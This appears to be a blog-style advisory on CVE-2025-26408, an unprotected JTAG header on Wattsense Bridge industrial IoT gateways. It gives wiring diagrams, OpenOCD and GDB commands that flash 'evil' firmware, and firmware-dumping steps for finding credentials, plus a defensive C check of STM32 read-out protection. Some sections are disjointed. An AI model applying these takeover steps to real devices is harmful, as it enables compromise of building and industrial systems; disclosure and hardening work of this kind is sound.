CVE-2025-26408 - Full Device Takeover via Exposed JTAG on Wattsense Bridge (All Versions Affected)
---
Summary
In early 2025, security researchers uncovered a serious vulnerability — now known as CVE-2025-26408 — affecting all versions of Wattsense Bridge devices. The root of the issue lies in the device’s JTAG debugging interface, which remains exposed and unprotected on the printed circuit board (PCB). Anyone with brief physical access can connect to the JTAG pins, bypass software protections entirely, and gain complete control over the device. This post explains the vulnerability, details how it works, includes code snippets, and offers original links and references for further reading.
What Is Wattsense Bridge?
Wattsense Bridge is an industrial IoT gateway, widely used to connect building management systems (BMS) and industrial sites. These devices are deployed in commercial buildings, factories, utilities, and smart infrastructure, often holding valuable network and sensor data.
With a debugger attached, an attacker can also debug or monitor live execution on the device.
This is classified as an unauthenticated physical-access vulnerability with maximum impact: full device compromise.
Remove the Device Cover
Unscrew the casing to reveal the main PCB. Locate the JTAG header, typically a 4- to 10-pin connector (often labeled TCK, TMS, TDI, TDO, GND, VCC).
Connect Debugger
Use a standard JTAG programmer such as a Segger J-Link, Olimex ARM-USB-OCD, or a cheap STM32 "Blue Pill" board running Black Magic Probe. Match the pinout as per the Wattsense Bridge schematics (*if publicly available*).
```bash
openocd -f interface/jlink.cfg -f target/stm32f4x.cfg
```
Extract Sensitive Information
Use strings or binwalk on the dumped firmware to find hardcoded credentials, certificates, or config files.
Wiring the JTAG header usually looks like this:
```text
Wattsense PCB      Debugger
TCK  <---->  TCK
TMS  <---->  TMS
TDI  <---->  TDI
TDO  <---->  TDO
GND  <---->  GND
VCC  <---->  VCC (optional!)
```
Always double-check orientation and voltage before connecting!
No Countermeasures
No public documentation shows any JTAG disabling, tamper detection, or password requirements in firmware or hardware. All known releases of Wattsense Bridge are vulnerable.
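As an added illustration (not code from the advisory or from Wattsense), the following host-side C decoder shows what the missing "JTAG disabling" countermeasure looks like on the STM32F4 family that the advisory's own OpenOCD `target/stm32f4x.cfg` line implies; that MCU family, and the constructed register values, are assumptions. It decodes the read-out protection (RDP) byte of FLASH_OPTCR so a deployment audit can report whether the debug port is actually locked.

```c
/*
 * Added example, not part of the original advisory. Decodes the STM32F4
 * flash option control register (FLASH_OPTCR) to report whether the
 * JTAG/SWD debug port is locked. The STM32F4 target is an assumption taken
 * from the advisory's "target/stm32f4x.cfg" OpenOCD line.
 *
 * RDP byte = FLASH_OPTCR[15:8]:
 *   0xAA  -> level 0: no protection, debug port fully open (the state above)
 *   0xCC  -> level 2: debug port permanently disabled (irreversible)
 *   other -> level 1: flash reads blocked while a debugger is attached, but
 *            the port still answers and level 1 can be regressed to level 0
 *            (with a mass erase), so it does not close the door by itself.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define FLASH_OPTCR_RDP_SHIFT 8u
#define FLASH_OPTCR_RDP_MASK  0xFFu

/* Return the read-out protection level (0, 1 or 2) encoded in FLASH_OPTCR. */
int rdp_level_from_optcr(uint32_t optcr)
{
    uint8_t rdp = (uint8_t)((optcr >> FLASH_OPTCR_RDP_SHIFT) & FLASH_OPTCR_RDP_MASK);
    if (rdp == 0xAA) return 0;
    if (rdp == 0xCC) return 2;
    return 1;
}

/* Only RDP level 2 actually disables the JTAG/SWD access this advisory describes. */
int debug_port_locked(uint32_t optcr)
{
    return rdp_level_from_optcr(optcr) == 2;
}

int main(void)
{
    /* Constructed sample values; 0x0FFFAAED is the documented reset default (RDP = 0xAA). */
    const uint32_t samples[] = { 0x0FFFAAEDu, 0x0FFF55EDu, 0x0FFFCCEDu };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        printf("OPTCR=0x%08X  RDP level %d  debug port %s\n",
               (unsigned)samples[i], rdp_level_from_optcr(samples[i]),
               debug_port_locked(samples[i]) ? "LOCKED" : "OPEN");
    }
    return 0;
}
```

A firmware build can run the same decode at boot against the live register and log the result, so an unlocked unit is visible in fleet telemetry rather than discovered by someone with a screwdriver.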
Exploit Demo
Here's a trimmed, real-world example using OpenOCD + GDB:
```text
# Start OpenOCD
openocd -f interface/jlink.cfg -f target/stm32f4x.cfg
# In another terminal
arm-none-eabi-gdb
(gdb) target remote localhost:3333
(gdb) load my_evil_firmware.bin
(gdb) continue
```
This session directly reprograms the device firmware, bypassing any OS-level protections.
Affected
- All Wattsense Bridge hardware, all firmware versions (no known patches)
- Any organization that deploys these devices in accessible areas (e.g., public buildings, malls, basements)
References
- NIST NVD: CVE-2025-26408
- Hackaday: Why Exposed JTAGs Are Dangerous
- Wattsense documentation
Closing Thoughts
Unfortunately, this vulnerability is an example of a common but critical hardware security oversight — leaving debugging interfaces open in production. Anyone who can open the device can bypass all other protections. As exposed JTAGs affect not only Wattsense but countless IoT and industrial devices, manufacturers must treat hardware security as seriously as software. For now, users should treat these devices as untrusted if physical access can’t be strictly controlled.
If your infrastructure depends on Wattsense Bridge: check your deployments — and demand a hardware fix!
Timeline
Published on: 02/11/2025 10:15:09 UTC
Last modified on: 03/22/2025 15:15:38 UTC